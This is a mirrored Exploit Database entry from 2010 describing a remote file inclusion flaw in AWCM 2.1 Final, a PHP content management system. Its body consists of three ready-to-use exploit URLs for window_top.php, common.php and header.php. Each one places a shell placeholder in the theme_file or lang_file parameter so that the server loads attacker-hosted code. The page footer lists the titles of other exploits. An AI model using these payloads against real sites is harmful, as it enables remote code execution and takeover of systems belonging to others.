AWCM 2.1 Final – Remote File Inclusion

Exploit Database
37 阅读

作者： LoSt.HaCkEr

日期： 2010-11-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/15510/

[+]Exploit Title: [awcm v2.1 final Remote File Inclusion]
[+]Date: [13-11-2010]
[+]Author: LoSt.HaCkEr~aDaM_TRoJaN
[+]Software Link: [www.awcm-cms.com]
[+]Version: [v2.1]
[+]CVE :I'M IRaQi ~ Hacker town of Musayyib
[+]Contact: LoSt.HaCkEr[at]yahoo[dot]com ~0r~ LoSt.HaCkEr[at]HaCkEr.ps
http://sourceforge.net/projects/awcm/files/
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+]Exploit: http://target/awcm v2.1 final/awcm/includes/window_top.php?theme_file=[ShELL]
[+]Exploit: http://target/awcm v2.1 final/awcm/control/common.php?lang_file=[ShELL]
[+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings:No Greet!_!

last Exploits
AWCM 2.1 Final – Remote File Inclusion的更多信息

rconfig 3.9.7 – Sql Injection (Authenticated)：
PACSOne Server 6.6.2 DICOM Web Viewer – Directory Trasversal：
joelz bulletin board 0.9.9rc3 – Multiple SQL Injections：
FileThingie 2.5.7 – Arbitrary File Upload：
Printable Staff ID Card Creator System 1.0 – ’email’ SQL Injection：
Telmanik CMS Press 1.01b – ‘pages.php?page_name’ SQL Injection：
MyAwards MyBB Module – Cross-Site Request Forgery：
Chyrp 2.x – ‘/includes/lib/gz.php?File’ Traversal Arbitrary File Access：